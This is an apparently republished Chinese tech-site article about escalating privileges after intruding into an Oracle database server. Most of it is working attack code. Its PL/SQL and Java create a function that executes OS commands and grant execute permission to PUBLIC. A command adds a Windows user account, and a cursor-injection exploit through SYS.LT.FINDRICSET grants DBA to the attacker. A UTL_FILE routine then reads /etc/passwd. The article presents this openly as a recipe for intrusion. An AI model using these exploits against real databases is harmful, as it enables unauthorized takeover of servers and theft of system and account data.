Oracle服务器如何进一步的获取权限

数据库 Oracle
以下的文章主要描述的是如何对入侵Oracle服务器的进一步来获取权限有一个正确的操作方案,以下就是相关方案的介绍。

再进行入侵Oracle服务器的进一步来获取权限时,我们需要快速的连接上Oracle服务器,此时你会发现,的情况有,连接之后不是dba权限,或不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限。

3.运行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后发现oracle服务器不能连接网络。

幸运的是,

运行

 

  1. create or replace function Linx_Query (p varchar2) 
    return number authid current_user is begin execute 
    immediate p; return 1;end; 

成功!这个用户具有create proceduce权限。

此时马上想到创建java扩展执行命令:

 

  1. create or replace and compile java source named 
    “LinxUtil” as import java.io.*; public class LinxUtil extends Object 
    {public static String runCMD(String args) {try{BufferedReader 
    myReader
    new BufferedReader
    (new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); 
    String stemp,
    str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” 
    “;myReader.close();return str;} catch (Exception e){return e.toString();}}}  
  2. begin dbms_java.grant_permission
    (‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘
    <>’, ‘execute’ );end;  
  3. create or replace function LinxRunCMD(p_cmd in varchar2) 
    return varchar2 as language java name 
    ‘LinxUtil.runCMD(java.lang.String) return String’  
  4. select * from all_objects where object_name like ‘%LINX%’  
  5. grant all on LinxRunCMD to public  
  6. select LinxRunCMD(‘cmd /c net user linx /add’) from dual  

 

但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!

还好,我们还有UTL库可以利用:

 

  1. create or replace function LinxUTLReadfile 
    (filename varchar2) return varchar2 is  
  2. fHandler UTL_FILE.FILE_TYPE;  
  3. buf varchar2(4000);  
  4. output varchar2(8000);  
  5. BEGIN  
  6. fHandler :UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);  
  7. loop  
  8. begin  
  9. utl_file.get_line(fHandler,buf);  
  10. DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);  
  11. exception  
  12. when no_data_found then exit;  
  13. end;  
  14. output :output||buf||chr(10);  
  15. end loop;  
  16. UTL_FILE.FCLOSE(fHandler);  
  17. return output;  
  18. END;  

 

UTL_FILE_DIR需要先用:

 

  1. CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’; 

指定目。但运行后发现没有权限。只好想办法提权。

游标注射

老外写了N个pdf介绍这技术,我精简了代码:

 

  1. DECLARE  
  2.  
  3. MYC NUMBER;  
  4. BEGIN  
  5. MYC :DBMS_SQL.OPEN_CURSOR;  
  6. DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; 
    begin execute immediate 
    ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);  
  7. DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  8. BEGIN SYS.LT.FINDRICSET
    (‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;  
  9. raise NO_DATA_FOUND;  
  10. EXCEPTION  
  11. WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  12. WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  13. END;  

 

运行后重新连接就有dba权限了,简单吧……

现在可以读取文件了:

 

  1. CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;  
  2. select LinxUTLReadfile(‘passwd’) from dual  

 

后面就简单了,不写了。上述的相关内容就是对入侵Oracle服务器进一步获取权限的描述,希望会给你带来一些帮助在此方面。

【编辑推荐】

  1. 在Oracle数据库中使用PL操作COM对象
  2. 对联机备份Oracle数据的解剖
  3. Oracle动态Web开发实例演示
  4. Oracle移植到mysql中,应注意的事项
  5. Oracle进程中出现带锁状况的解决

 

责任编辑:佚名 来源: 博客园
相关推荐

2010-04-26 12:29:31

Oracle服务器

2022-01-04 13:21:30

稳定币加密货币货币

2009-12-28 10:08:07

OracleSQLDevelope开发框架

2010-03-01 15:50:45

2021-04-05 18:06:36

谷歌安卓Google Play

2011-07-27 12:58:43

Android MarAndroid应用商店

2023-12-20 09:55:51

雷达传感器算法

2020-11-13 12:24:10

Google

2020-12-10 20:00:04

数字货币比特币区块链

2011-07-29 15:02:22

LifeSize视频协作

2022-02-21 10:37:32

数字人民币北京冬奥会

2023-09-01 18:20:43

Chrome代码测试版

2019-03-22 10:20:39

加速Windows 10启动

2017-05-28 12:09:07

CDNIPTV运营商

2013-10-17 17:29:38

华为ICT华为

2024-05-10 15:09:34

2009-08-26 14:48:05

C#委托与事件

2010-03-15 09:40:19

Windows 8研发

2009-02-05 11:41:07

Oracle甲骨文CRM

2014-01-08 10:22:28

思科Videoscape
点赞
收藏

51CTO技术栈公众号